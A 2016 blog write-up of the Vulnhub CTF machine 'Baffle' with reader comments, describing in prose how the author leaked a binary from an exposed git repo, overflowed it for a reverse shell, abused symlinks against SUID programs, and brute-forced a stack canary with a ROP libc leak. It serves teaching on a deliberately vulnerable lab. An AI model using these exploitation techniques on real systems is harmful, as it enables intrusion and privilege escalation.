Friday, 30 December 2016

Baffle - DC416: 2016 - Vulnhub Solution - Write-up

This is the first time I've ever done a write-up for a Vulnhub VM, but I figured it was about time I started doing it.  In addition 'Baffle' was the hardest vulnerable VM I've tackled to date, as it required a large degree of binary analysis and reverse engineering; something I don't have all that much experience in.  I used Kali Linux with GDB+PEDA for all binary analysis.

Baffle is one of four vulnerable VM's released 5 December 2016 as part of DefCon Toronto's first offline CTF event.  You can find all the information related to it here.  With that said, let's get on with it.

I won't cover the exact details of everything I did, I'll try to stick to the important bits.  So, Baffle got fired up, IP address determined (netdiscover), entry added to hosts file (victim), let's see what we're working with.

From reading the blurb on Vulnhub, I knew that each of the four DC416 boxes had a landing page, so let's take a look:

So we know this much so far:

  • Five flags to find, and their format
  • There's a web server of some description running on port 80
  • We don't need to brute-force any usernames/passwords
At this point I did my usual of looking for any admin/login (html|php) files, but couldn't immediately find anything useful.  Let's see if dirb can help shine any light on what might be available.

Oooh, .git, looks like a possible GIT repo.  We shall have to pull that down and take a look.  However, before I get too carried away, let's fire up nmap and see what else might be available to play with.

A standard TCP Syn scan of the box has indeed confirmed the existence of a GIT repo, along with the last commit message; which seems a little worrying......

I'll save you the trouble of waiting on a full UDP scan, there's nothing running.

So we've got:

  • Webserver on port 80 (nginx 1.6.2) - We already knew this existed
  • SSH on port 22 - Might be worth a look, if we can find a username/password
  • Something on port 6969...........
At this point I got all excited and went off on a several hour long wild goose chase seeing if port 6969 was anything to do with BitTorrent.  It was not.  Grr, fine, I'll go take a look at the GIT repo....

Let's clone it!

Pardon me?  

Queue twenty minutes of furious Googling to make sure I wasn't being a total idiot......nope, not a total idiot at all.  There's no .git file.....

Now I'm no git expert, but I do know that there's a supposed to be a .git file, and there isn't.  I guess that curious message in the last commit might explain something.  Looks like we've got a busted git repo.  I'll just download the entire thing using wget and poke at it on my machine.

Running wget -r http://victim/.git/ downloaded the entirety of the .git folder to my machine.  However, it also created about a million and one index.html files that I don't want, a quick bit of shell work will get rid of those.. 

Great, we now have a git repo, sans a .git file.  Let's see if we can recover anything.  What about some logs?

Great!  We have some logs, and we now also have one a potential username; Alice.  Either way, things aren't looking too good for Alice, it seems that she's blaming her cat, and we might not have a particularly happy program to play with.  Let's see if we can actually get any source code out of this thing.

Great!  So what's in hellofriend.c?

Right, so we've got a c file, cool.  What does it do?  Not a great deal by the looks of things......

We're allocating a buffer, filling it with zeros, setting up some more buffers, and then checking the request type......well, that bit isn't done yet.

This is all well and good, but it would be nice to see the git logs against the source code and changes that were made (enter some googling here), and .... git log -p

This produced a complete log of all git commits, along with the comments, and what changes were made.  After browsing through the logs and code for a bit (which is huge and I'll put a copy up here if I can figure out how), I spotted a few things:

  • A single program 'hello.c' has been written, and subsequently trashed.....
  • It appears to read from files
  • It appears to write to files
  • There are two branch conditions, 1 = read, 2= write
At this point there is probably a nice elegant solution to actually obtaining the complete binary from the git logs, however I didn't know how to do it.  I did however, see this in the logs:

That looks a lot like BASE64 encoding to me, and the fact that it's called 'project.enc' suggested it might be.  So I extracted the text into a file, base64 decoded it, and made it executable.

Looks promising!

Ace, this indeed looks like our binary.  The question is what does it do, how does it do it, and does it contain any vulnerabilities.  At this point I began studying the binary, single stepping through it and taking notes.  I also made the assumption that this is in fact the program running on our somewhat mysterious port 6969.

After going through the source code for a while, I noted that if branch condition 1 was taken, a file would be read.  This can be seen in below:

The highlighted instructions essentially show that if the branch condition is 1, open a file and read it's contents.  So great, if the input starts with a 1, read a file.  Note quite; there's an odd instruction at +92 which increments EAX by one.  So the one needs to be at the second position in the string.  It's far easier to show how it works using ltrace:

So great, it appears to open a file, let's make sure it works.

Awesome, we can use it to read a file.  Note that you have to pad the name with anything so that it fits.  So now it's time to find out if this is in fact the program running on port 6969, and if there's a file called flag.txt that it can access?

Beautiful, we have our first flag, FLAG{is_there_an_ivana_tinkle}  This wasn't quite as smooth as illustrated here, a lot of testing and single stepping was required to figure out exactly how the program worked.

I also tried to read additional files, but without knowing any specific file names, we'd just be guessing.  So it's time to move on and see what happens if branch condition 2 is hit.

Above, you can see the section of code that occurs when branch condition 2 is followed.  If you follow the code, you'll see that it copies data passed in,  into a buffer; that's it.  It just copies data, it doesn't do anything with it afterwards.  This immediately looked like it had been written purely to be overflowed.  It was time to test this assumption.

The interesting bits shown in the above image are:
  • +265 -  If the second byte of input is a 0x02
  • +345-353 - Do some weird stuff with the string pointer.....
  • +362 - Fixed memory address of our buffer 
  • +410 - 0x7d0 (2000) bytes, the amount of bytes to copy into the buffer
So we have a similar process to the previous branch condition, if the second byte of the input is a 0x02, copy whatever was entered by the user into a buffer at a fixed address (0x600de0).

At this point, to keep this document readable in under a day, I wont cover the complete analysis of the binary, I'll leave that as an exercise for the reader.  However, after a lot of manual fuzzing and single stepping, it seemed that if a specific sequence of strings were entered as input, it's possible to gain control over RIP through a buffer overflow.  The questions now was can we get some shell-code in there?

Awesome, no security is in place.  Let's build a payload.

The key to this part of the challenge was to understand how the input was processed (hint: null bytes).  If you look at the second previous picture you can see some odd pointer manipulation happening at +345-353.  Unfortunately, my notes from this part of my analysis are terrible (always keep good notes!), so I'll just show the exploit I created, which aimed to create a reverse shell on port 1337.  The shell-code I used is available here.

This is probably going to make seasoned exploit writers gag, and probably Python programmers too; but remember this is all somewhat new to me, so everything is a learning experience.  Let's try throwing our payload at port 6969 and see what happens.

Hooray, we're in as Alice!  Time to take a look around and see what we can find.

OK, so these are our users on Baffle, good to know.  After some manual searching through the file system, I also came across an email to Alice in /var/mail:

Oh, really?

Well I certainly don't have any authentication codes, maybe there's a vulnerability in this app?  I copied the files locally to my host machine and started playing about with them.  Noticing the structure of the /home/bob/filez directory, I also created the two files; flag.txt and auth.txt.  What was even more interesting is that the flag_vault is an SUID binary, privilege escalation maybe?

Uh oh!  This is new.  Not only do we have the NX bit set, we're also dealing with a stack canary. Essentially a stack canary, or stack cookie, is a value that is stored on the stack somewhere before the return address.  Therefore an attacker cannot overwrite the return address, without also overwriting the canary, which is checked prior to returning from a call.  If the checked canary value and the original don't match, stack smashing is detected and the program is terminated.  You can read all about them here.

OK, forgetting about canaries for the moment, how does this program work?

OK, simple enough.  The contents of the auth.txt file are checked against whatever the user entered. If they match, it must read the contents of the flag.txt.  After confirming this, I then spent several hours buggering about with ways to try to bypass the stack canary, which led me to this conclusion. There are two ways to get the flag from this vault; the simple way, and the convoluted way that I did it.

Let's begin with the simple way.

As you can see from above, the program uses relative path names to refer to files, leaving it wide open to some sym-link attack goodness.

The setup is this; create a new directory 'test' in Alice's home directory.  Create the 'auth.txt' file containing whatever you like.  Then create a symlink for the file 'flag.txt' which points into /home/bob/filez/flag_vault, like this:

Beautiful, we have not only our second flag, but an SSH password for Bob, so we can now get a decent shell to use.  So our second flag is: FLAG{tr3each3ry_anD_cUnn1ng}.

Backtracking slightly, let's take a look at the somewhat convoluted way I used to get the flag.  I got very preoccupied with the stack canary and wondered if there was someway to bypass it and gain privilege escalation.  After a lot of debugging, I noted that if stack smashing was detected (through an over written canary value), the function __stack_chck_fail was called, which in turn called __fortify_fail which would then inform the user that the program had been terminated.

After a lot more reading, I came across this article, which is a six year old CVE relating to SUID binaries that use stack canaries.  The issue is that when the program is terminated, __fortify_fail informs the user and provides a handy stack trace.  Like this.

The exact location of the canary was determined through a lot of debugging and fuzzing.  The interesting bit here is highlighted.  The name of the process that was terminated actually comes from argv[0], it just reads the contents of the buffer to get the name of the process.  What happens if we point it at a different buffer, like say, the buffer that contains the contents of the auth.txt file?

The plan here is this; perform a buffer overflow, deliberately overwriting the stack canary to trigger the stack smash termination, which will then read from what it thinks is argv[0].  From analysing the binary, we can see that the buffer containing the contents of the auth.txt file is loaded at the fixed address 0x08049ce0.  Let's try this out:

Seems it didn't like our code.  What's happening on the other terminal that injected the netcat payload?

Awesome!  We can now give this code to the flag_vault and get our flag.  I guess bonus points for us for getting the flag and the auth code.  Right?......

OK, two flags down, let's go find the third.  Let's begin by SSH'ing in as Bob using our new credentials.

After poking around a bit, I found this:

Oooh, Charlie's password!  Nope, red herring :D

After some more poking, the next thing of interest that I found was a file named ctfingerd  in the /home/bob/binz directory.  Let's run that and see what it does.

OK, we can't run it as it's already in use.  Let's see where it might be.  Netstat tells us there's something running on port 7979, that must be it!  Connecting to localhost 7979 asks us for a user to query, so we try Bob, we then get some text back, which I recognised as the contents of the .plan file that exists in each user's home directory.  Let's also check Charlie's plan file.  Hmm, so he has a flag does he....

At this point I downloaded the ctfingerd program locally so I could play about with it.

So it seems that this program will read the .plan file from which user is specified.  However, it does this once again using relative path names, and seems to accept a path as the username.  So I managed to get the third flag using the approach shown below:

Awesome, another spot of sym-link manipulation has given us the third flag; FLAG{i_haz_sriracha_ice_cream}.  Hey, maybe we can use this to get the flag from the vulnhub home directory!?

Grumble.  Oh well, it was worth a shot.  This also shows that we're going to need to get into the vulnhub home directory if we want that flag.

OK, so Vulnhub owns the file, and it's running as Vulnhub.  If we can find a vulnerability, we might be able to spawn a shell as Vulnhub.  Let's take a look at the ctfingerd binary.

Once again we are faced with a 64-bit, nx enabled, stack canary protected binary, this isn't going to be easy to break.  I initially started debugging the binary to see if I could figure if I could get a buffer overflow to occur.  So I fired up ctfingerd locally, and started fuzzing it.

You'll see that in the event of the process being terminated, we lose the final "---" characters from the server response.  That will come in useful later!

After some manual fuzzing, it appeared that we had 1000 bytes to play with before our stack canary. And from what I know about stack canaries, immediately after that should be the saved RBP, then the return address.  Again, I'm not going to go into depth on the binary analysis, as it would take quite a while.  If people are super interested I'll write a separate blog post.

So after some digging, it appears we have a potential buffer overflow vulnerability.  However to make use of it, we have to overcome three problems.  Firstly, dealing with the stack canary, second, nx is enabled, so we can't inject shell-code into the stack.  And lastly:

ASLR is enabled on Baffle, so things are going to move about all over the shop.  OK, I got my thinking cap on here.

The stack canary cannot be bypassed, nor can we purposely overwrite it like in the last attack, so many there is a way to brute force it?  Each time the ctfingerd program is started, a new canary is generated, so there's no way of knowing it in advance.  However, after reading this article, something became apparent.  The TL:DR here is that when a process forks, the child process inherits the canary from it's parent.  So if we keep the parent process alive, we can examine the canary and use it each time we make a connection to the server to inject our payload.

The second problem to overcome is the nx bit being enabled.  We can't execute any shell-code from the stack, so we're going to have to use Return Oriented Programming (ROP) to perform any operations we need.  I'll cover ROP a little more when I discuss the exploit I developed.  You can read more about it here.

Lastly, ASLR is enabled on baffle, so libc is going to be a different location each time the program is run, so we can't rely on any hard coded memory locations.  I read an excellent article on dealing with ASLR here (written by the author of Baffle himself!)

Rather than discussing the binary analysis, I think it's probably easier to show the exploit I wrote, and explain it along the way.

OK, we begin by brute forcing the canary value.  Essentially try all 256 possibilities (0x00-0xFF) on each byte of the canary in sequence.  If we don't terminate the process, we'll get the "---" in the server's response, so we know that byte is good.  Repeat this process for all 8 bytes of the canary.

In a moment we're going to need to figure out where libc is loaded.  In order to do that we'll have to make a ROP chain to call write() so it can provide us with that information.  This is referred to as an information leak, essentially we're calling write() and asking it to give us the data stored at a specific memory address.  That address is the Global Offset Table (GOT) entry for sprintf.  This isn't the article to fully explain how lazy loading and the GOT/PLT work, but you can find plenty of information about it online.

You might be wondering why in the server response, we see the FD number.  I wondered this at first myself, but once I got into exploit writing it became clear.  It's provided so we can perform the information leak.  If you're writing your own client/server program, it's probably a good idea to keep this kind of information to yourself!

Once we've brute forced the canary and figured out which socket we want the process to talk to us on, it's time to inject a payload to leak the address of sprintf, and from that calculate where in memory libc is loaded.  Why choose sprintf?  Ultimately it doesn't matter which function you target, you just need to make sure that it's been called by the process prior to injecting your payload, could have used memset, just sprintf happened to be the first one I saw.

The next portion of the exploit sets up our payload so that we can leak sprintf's address and calculate libc's base address.  You'll also notice that I hard coded in the canary value, this was just for convenience/testing sake and you can of course automate it.  And again, the value I'm using won't be the same for you.  Or it might, it's possible!

Lines 54-59 set up all the address's of things we know.  The ROP gadgets necessary for the exploit were found using the GDB-PEDA tool 'ropsearch'

Unfortunately we don't have a gadget for controlling what's in RDX, so we're just going to have to hope that it's at least 8 bytes!

The offset of write() and the libc offsets were obtained using objdump and readelf respectively.  An important point to note is that Baffle and my Kali linux box are using different versions of libc, so I had to update the exploit before I ran it on Baffle.  The commands to perform are the same, we'll just have different offset.  So the values you see in the picture below are for my Kali Linux box, and the values in the exploit code are for Baffle.

The ROP chain injection can now occur.  We call write, telling it to write the GOT entry for sprintf to the socket that the server is communicating with us over.  Remember to add one to the socket number if you do this in separate communications!

OK, so far so good (I think), if we run this on baffle we should be able to calculate the base address of libc and therefore calculate the address of system().  Let's try it.

Awesome!  We've leaked the address of sprintf, used that to calculate the base of libc and finally determined the address of system.  We're now ready to build a payload to make a system call.  Note here, that we can't just spawn a shell, as it will spawn in the background and we have no way of getting access to it.  Instead, we're going to have to spawn a reverse-bind shell using netcat, much like we did with the previous attack.

The code above is the meat of the payload.  This injects our string into memory using a call to read(), which does similar to write, except this time we're giving it a value over the socket and telling it to put something in memory; our string.  Why choose 0x601010 for the string location?  It comes down to a simple choice, we need somewhere we can write to in memory!  We can't use the stack as we don't know its address, and we don't have a 'push rsp; pop rdi; ret' type gadget.  That address was chosen as it's in the dynamic portion of the ELF file, same area as where the GOT is stored, and we know that's writable.  Be careful when choosing targets for planting strings, the last thing you want to do is to overwrite a GOT entry and cause the program to super fail, but in this instance it didn't really matter if we overwrite anything afterwards, we'd soon be leaving.....

So essentially, it's a case of putting the values we need onto the stack, popping them into the right registers using the ROP chains, and calling the functions.  Let's start a netcat listener on port 99 and hit the enter button....(fingers crossed)

Hooray, we're in.  Now where's that flag.....

Fantastic, the fourth flag; FLAG{i_tot_i_saw_a_puddy_tat}

Great, just one flag left.........

At this point I got a bit stuck, and spend a couple of hours floundering about in the file system looking seemingly everywhere.  No flag to be found.....hmm

I jumped into the #vulnhub IRC channel and had a quick chat with Baffle's author, superkojiman about what I'd found thus far, and how the final flag was proving elusive.  He laughed, and told me that the flag I was missing was actually the first one, and I should backtrack to before I got a shell.....

Before I had a shell?  Before that I had nothing.....maybe the git repo?  Perhaps I missed something in the source code?

After a few minutes of reviewing the source code and git logs, I found this.  See if you can spot anything...

Can you see it?  Maybe this will help

The final (or first) flag: FLAG{ARSE_REQUEST}

So there you have it, all of the flags found:

flag1: is_there_an_ivana_tinkle
flag2: tr3each3ry_anD_cUnn1ng
flag3: i_haz_sriracha_ice_cream
flag4: i_tot_i_saw_a_puddy_tat

Apologies if this write-up was too long, or didn't provide enough detail on certain areas, it's the first I've ever written.  Any comments or suggestions would be greatly appreciated!

Big shout out to superkojiman for creating this VM, it was super challenging and a lot of fun.  Also kudos to T0w3ntum for helping bounce ideas back and forth.

More write-ups to come, and if this has taught me anything, it's to keep better notes!!


  1. Finally a walk through! I took the same approach as you, all flags except the first one...

    1. how did you decode that long string.when i try to copy from console to echo it says base64:invalid input

    2. Okay i got it by going exact commit, then project.enc was in git depository.

  2. very very very great job MrTHaggar
    could you please tell me how did extract project.enc?

    1. Thank you!

      I just copied the text out of the log file into a plain text file, then Base64 decoded it. Just remember to remove all of the '-' or '+' characters from the start of each line.

  3. Hi Bro, I have a problem when trying to get system address. I get the leak address of sprintf from the program.
    system address = leak_sprintf - sprintf_offset (0x55940) + system_offset (0x45390).
    So when I put it into payload, RIP point to the system address and it is corrupted.
    $ ldd ctfingerd => (0x00007ffed2fde000) => /lib/x86_64-linux-gnu/ (0x00007f5d3ab81000)
    /lib64/ (0x0000556b03f14000)

    $ readelf -a /lib/x86_64-linux-gnu/ | grep "system"
    225: 0000000000137c20 70 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.2.5
    584: 0000000000045390 45 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
    1351: 0000000000045390 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5

    $ readelf -a /lib/x86_64-linux-gnu/ | grep "sprintf"
    110: 00000000000766d0 343 FUNC WEAK DEFAULT 13 vasprintf@@GLIBC_2.2.5
    152: 0000000000055940 143 FUNC GLOBAL DEFAULT 13 sprintf@@GLIBC_2.2.5
    407: 0000000000115ae0 163 FUNC GLOBAL DEFAULT 13 __vsprintf_chk@@GLIBC_2.3.4
    525: 0000000000070160 170 FUNC WEAK DEFAULT 13 vsprintf@@GLIBC_2.2.5
    726: 0000000000070160 170 FUNC GLOBAL DEFAULT 13 _IO_vsprintf@@GLIBC_2.2.5
    903: 0000000000055940 143 FUNC GLOBAL DEFAULT 13 _IO_sprintf@@GLIBC_2.2.5
    1250: 00000000000559d0 143 FUNC WEAK DEFAULT 13 asprintf@@GLIBC_2.2.5
    1880: 0000000000117d10 359 FUNC GLOBAL DEFAULT 13 __vasprintf_chk@@GLIBC_2.8
    1929: 0000000000115a40 133 FUNC GLOBAL DEFAULT 13 __sprintf_chk@@GLIBC_2.3.4
    1932: 00000000000559d0 143 FUNC GLOBAL DEFAULT 13 __asprintf@@GLIBC_2.2.5
    2115: 0000000000117c80 138 FUNC GLOBAL DEFAULT 13 __asprintf_chk@@GLIBC_2.8
    Please help me. Thanks

    1. Sorry, I tried it again and it worked. But if I use leak_memset it will be wrong. Can you help me figure out ? Thanks bro.

    2. I used sprintf instead of memset, as I was getting calls to SSE2_memset (or similar) and I wasnt' sure why. Might be worth checking in a debugger to see if it's happening.

  4. This comment has been removed by the author.

  5. Hello there,

    Thx a lot for the tutorial, this type of writeup helps a me a lot in my self-teaching and I can't be thankful enough to pps like you :).

    I'm having issues with the second flag in GDB, though. When I use "disas main", I only get the output below :

    Dump of assembler code for function main:
    0x00000000004008f7 <+0>: push %rbp
    0x00000000004008f8 <+1>: mov %rsp,%rbp
    0x00000000004008fb <+4>: sub $0x7f0,%rsp
    0x0000000000400902 <+11>: mov %edi,-0x7e4(%rbp)
    0x0000000000400908 <+17>: mov %rsi,-0x7f0(%rbp)
    0x000000000040090f <+24>: mov 0x2004aa(%rip),%rax # 0x600dc0
    0x0000000000400916 <+31>: mov $0x0,%esi
    0x000000000040091b <+36>: mov %rax,%rdi
    0x000000000040091e <+39>: callq 0x4005c0
    0x0000000000400923 <+44>: lea -0x7e0(%rbp),%rax
    0x000000000040092a <+51>: mov $0x7d0,%edx
    0x000000000040092f <+56>: mov $0x0,%esi
    0x0000000000400934 <+61>: mov %rax,%rdi
    0x0000000000400937 <+64>: callq 0x4005e0
    0x000000000040093c <+69>: lea -0x7e0(%rbp),%rax
    0x0000000000400943 <+76>: mov $0x7d0,%edx
    0x0000000000400948 <+81>: mov %rax,%rsi
    0x000000000040094b <+84>: mov $0x0,%edi
    0x0000000000400950 <+89>: callq 0x4005f0
    0x0000000000400955 <+94>: mov %eax,-0x4(%rbp)
    0x0000000000400958 <+97>: mov -0x4(%rbp),%edx
    0x000000000040095b <+100>: lea -0x7e0(%rbp),%rax
    0x0000000000400962 <+107>: mov %edx,%esi
    0x0000000000400964 <+109>: mov %rax,%rdi
    0x0000000000400967 <+112>: callq 0x400746
    0x000000000040096c <+117>: mov $0x0,%eax
    0x0000000000400971 <+122>: leaveq
    0x0000000000400972 <+123>: retq
    End of assembler dump.

    This is only the beginning, can you tell me how I can get the assembly code for the two branches (1 & 2, i.e. when the function parse-request actually gets executed) like it is shown in img 12 of 46 (your image being cropped, I can't see the command you used and I assume it must some variant of "disas main".

    Thx a lot,


    1. I can't remember off the top of my head what the names of the functions are. But if I remember correctly, disass main will show all of the instructions within the main function, there is also another function I think, 'parse_request' or similar. You can always do disass parse_request (or whatever it's called).

      Or if I'm remembering completely wrong, the code for the two branch conditions is within the main function, they are just relative jumps if the conditions are met. So all of the code you need is in the disassembly, I didn't do any special commands or anything.

      I hope that helps.